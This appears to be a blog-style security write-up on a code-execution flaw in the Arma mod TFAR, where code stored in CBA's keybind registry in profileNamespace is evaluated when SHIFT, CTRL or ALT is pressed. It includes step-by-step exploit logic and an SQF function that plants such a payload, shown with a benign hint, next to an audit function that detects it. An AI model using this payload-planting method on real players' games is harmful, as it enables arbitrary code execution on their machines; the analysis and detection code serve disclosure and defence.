TFAR Code Execution
Okay, the last bit was quite heavy, but now we know everything we need to write an exploitable payload into the keybind data. Let me lay out what we know in a more digestible form:
- The data's source is the profileNamespace variable "cba_keybinding_registry_v3"
- The action name is "tfar$lrtransmit"
- Finding the index of our action in (_registry select 1) gives us the index of its keybind data
- The keybind data itself is stored at that index in (_registry select 2)
- This keybind data is then copied into GVAR(actions) getVariable (action_name) under index #2
- In CBA_fnc_getKeybind the keybind data is nested one level deeper (it is accessed with select 0)
- CBA_fnc_getKeybind returns this keybind data under index #5
- The keybind data is structured as [keycode, keymods], where keymods is an array of boolean values
- If a value in keymods is code instead of a boolean, TFAR should lazily evaluate it as long as SHIFT, CTRL or ALT is pressed
So now that we know all of this, we can build an exploit.
Our first step is to get the existing registry for cba_keybinding_registry_v3 from profileNamespace, or create a new one if there is none. Next, we must find our action in the registry. If the action exists, we set the value in (_registry select 2) at that index to our payload. Remember, the payload must be an array inside an array, because CBA_fnc_getKeybind accesses index 0 before returning. If the action does not exist, we simply pushBack a new entry into the registry.
And that is it. Now if we load up a game with TFAR and press, in my example, SHIFT, it’ll execute the payload.
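The steps above, written out as an added SQF example (this is not the hastebin source linked below and not CBA or TFAR code). The registry layout follows the page's description: index 1 holds action names and index 2 the keybind data; the page does not say what index 0 holds, so the branch that creates a new entry treats it as a parallel array of mod names, which is an assumption. The key code 42 (DIK left shift) is only a placeholder used when the action is not yet registered. The payload is deliberately a harmless hint, and the second function is the check a defender would want: it scans a profile's registry for keymods that are not booleans.

```sqf
// Added example, not the author's exploit source. Registry layout as described on
// this page: [?, actionNames, keybindData]. Index 0 is assumed to be mod names.

// --- attacker side: plant a code value where TFAR expects a boolean keymod ---
fnc_plantKeymodPayload = {
    params ["_actionName", "_payload"];

    private _registry = profileNamespace getVariable ["cba_keybinding_registry_v3", [[], [], []]];
    private _names = _registry select 1;
    private _data  = _registry select 2;
    private _index = _names find _actionName;

    // Placeholder key code (DIK 42 = left shift); an existing entry keeps its own key.
    private _keyCode = 42;
    if (_index != -1) then {
        _keyCode = ((_data select _index) select 0) select 0;
    };

    // [keycode, keymods] wrapped in one more array, because CBA_fnc_getKeybind
    // does 'select 0' on the stored data before returning it.
    // keymods slot 0 (SHIFT) holds code instead of a boolean; the code returns a
    // boolean so the modifier check still ends up with a BOOL after evaluation.
    private _keybind = [[_keyCode, [_payload, false, false]]];

    if (_index == -1) then {
        (_registry select 0) pushBack "tfar";   // assumption: index 0 is the mod name
        _names pushBack _actionName;
        _data pushBack _keybind;
    } else {
        _data set [_index, _keybind];
    };

    profileNamespace setVariable ["cba_keybinding_registry_v3", _registry];
    saveProfileNamespace;
    _registry
};

// --- defender side: list every keymod in a registry that is not a boolean ---
// Returns [[actionName, offendingValue], ...]; an empty array means the profile is clean.
fnc_auditKeymods = {
    params ["_registry"];
    private _names = _registry select 1;
    private _data  = _registry select 2;
    private _findings = [];
    {
        private _entry = _x;
        private _actionIdx = _forEachIndex;
        if (_entry isEqualType [] && {count _entry > 0}) then {
            private _keymods = (_entry select 0) param [1, []];
            {
                if !(_x isEqualType true) then {
                    _findings pushBack [_names select _actionIdx, _x];
                };
            } forEach _keymods;
        };
    } forEach _data;
    _findings
};

// Usage (constructed): plant the benign payload, then audit the same registry.
private _planted = ["tfar$lrtransmit", {hint "keymod payload evaluated"; true}] call fnc_plantKeymodPayload;
private _report  = [_planted] call fnc_auditKeymods;
// _report now contains one finding for "tfar$lrtransmit" whose value is CODE.
```

Running the audit against a clean profile (`[profileNamespace getVariable ["cba_keybinding_registry_v3", [[], [], []]]] call fnc_auditKeymods`) should return an empty array; any CODE value in the report is exactly the condition TFAR lazily evaluates on the next SHIFT, CTRL or ALT press, so that entry should be deleted from the profile rather than just rebound.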
As always, the source for my exploit can be found on my hastebin here.